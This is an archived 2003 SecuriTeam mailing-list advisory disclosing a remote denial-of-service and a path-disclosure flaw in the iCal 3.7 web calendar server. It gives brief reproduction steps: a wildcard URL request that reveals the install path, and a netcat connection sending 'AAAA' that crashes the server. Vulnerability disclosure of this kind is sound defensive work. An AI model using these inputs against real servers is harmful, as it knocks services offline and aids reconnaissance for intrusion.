[NT] iCal Remote DoS and Path Disclosure
From: support@securiteam.com
Date: 01/05/03
- Previous message: support@securiteam.com: "[UNIX] Yabbse XSS Vulnerability in news_template.php"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 5 Jan 2003 12:03:00 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Beyond Security would like to welcome Tiscali World Online
to our service provider team.
For more info on their service offering IP-Secure,
please visit http://www.worldonline.co.za/services/work_ip.asp
- - - - - - - - -
iCal Remote DoS and Path Disclosure
------------------------------------------------------------------------
SUMMARY
<http://www.brownbearsw.com> iCal is a web calendar server for the
Microsoft Windows. It can be used to show meetings, events, or other
schedules. Calendars can be viewed, edited, and administered totally
through the web. iCal is built for thin-clients, so access calendar
without any plug-ins or Java interpreters. Two vulnerabilities in the
product allow remote attackers to reveal the true path used in the server,
and to cause the server to crash.
DETAILS
Vulnerable systems:
* iCal version 3.7
Path disclosure:
Accessing http//target/*
Will return the following error message:
Unable to write to D:\program files\iCl 3.7 Web Calendar\*.cal
Denial of service:
Connecting using "nc target 80" and then sending:
AAAA
[ And pressing enter ]
Will return an error message:
Access violation at address 00403d8b in module'ICAL.EXE' Read of address
0161c1af
ADDITIONAL INFORMATION
The information has been provided by <mailto:securma@caramail.com>
securma massine.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Next message: support@securiteam.com: "[TOOL] ARP Promiscuous Node Detection"
- Previous message: support@securiteam.com: "[UNIX] Yabbse XSS Vulnerability in news_template.php"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
